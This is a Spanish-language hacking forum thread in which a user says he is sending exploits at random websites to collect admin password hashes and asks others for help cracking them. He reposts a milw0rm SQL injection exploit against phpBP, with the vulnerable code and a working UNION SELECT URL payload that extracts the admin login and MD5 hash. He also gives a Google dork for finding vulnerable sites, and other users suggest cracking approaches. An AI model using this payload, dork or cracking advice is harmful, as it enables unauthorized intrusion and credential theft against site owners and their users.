Quien Me Ayuda con Los Hash?

[LoRd_BeLiAL]

Hola, ando enviando exploit a to lo q da por el maravilloso mundo de el internet...muchas de esas paginas me esta dando los hash....Pero mi problema es q estas paginitas de crackiar hash no estan actualizadas 


alguien q conosca una, buena buena buenaaaa q este actualizada??


o alguien me puede explicar la technica para yo mismo crackiar el hash?


muchas gracias al los q posteen 

[-ZeR0-]

Para poder crackear el hash tu mismo necesitarias mucho tiempo un PC o varios PC's,
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

www.milw0rm.com

   en esa paguina puedes crackear el hash

[LoRd_BeLiAL]

la intente  ya y nada, tengo una lista y ninguna me funciona

[LoRd_BeLiAL]

Compartire ek exploit q ando usando q me funciona de maravilla.... De antemanos les dejo saber q es de Milworm

pero pues lo q no logro conseguir es quien me crackee el hash 

Código:

.-----------------------------------------------------------------------------.
|  vuln.: phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability        |
|  download: http://www.phpbp.com/                                            |
|  dork: "PHP BP Team"                                                        |
|                                                                             |
|  author: irk4z @yahoo.pl                                                     |
|  homepage: http://irk4z.wordpress.com/                                      |
|                                                                             |
|                        --->    HACKBOX.pl    <---                           |
|                                                                             |
|  greets to: cOndemned, str0ke, wacky                                        |
'-----------------------------------------------------------------------------'

# code:

 ./includes/functions/banners-external.php:
 ...
3   function banner_out() //zlicza ilosc klikniec na banner
4   {
5    global $conf;
6
7    if($_GET['id'])
8    {
9     SQLvalidate($_POST['id']);
10
11    $db = new dbquery;
12    $db->query("SELECT * FROM $conf[prefix]banners WHERE id=$_GET[id]") or $db->err(__FILE__, __LINE__);
13
14    if($db->num_rows()==0)
15    {
16     redirect('index.php?module=error?error=banners_error2');
17     exit;
18    }
19
20    $d=$db->fetch_object();
21    $db->query("UPDATE $conf[prefix]banners SET views=views+1 WHERE id='$_GET[id]'") or $db->err(__FILE__, __LINE__);
22
23    redirect($d->url);
24   }
25
26   exit;
27  }
 ...

# exploit:

http://[host]/[path]/index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F,login,0x5F,pass),4,5,6,7,8,9/**/FROM/**/phpbp_users/**/LIMIT/**/1/*

you will be redirect to http://[login]_[md5_hash_pass] (ex. http://admin_21232f297a57a5a743894a0e4a801fc3/)

# milw0rm.com [2008-03-16]

Facil de entender:

una vez pongas la inyeccion, si la pagina es vulnerable te llevara a la paginita q te dice server not found (pagina no encontrada) pero te dira el nombre de el admin seguido por el hash de esta manera:

Código:

admin_9649dd00518a257d5568509e5398014

bueno suerte!



PD: Para buscar las paginas vulnerables, En el Buscador de Google ponen: "PHP BP Team" (con las Comillas)

 

[S3b4]

quizás usan un sistema de encriptación hecha por ellos mismos (phpbp), busca que sistema usan y el respectivo crackeador.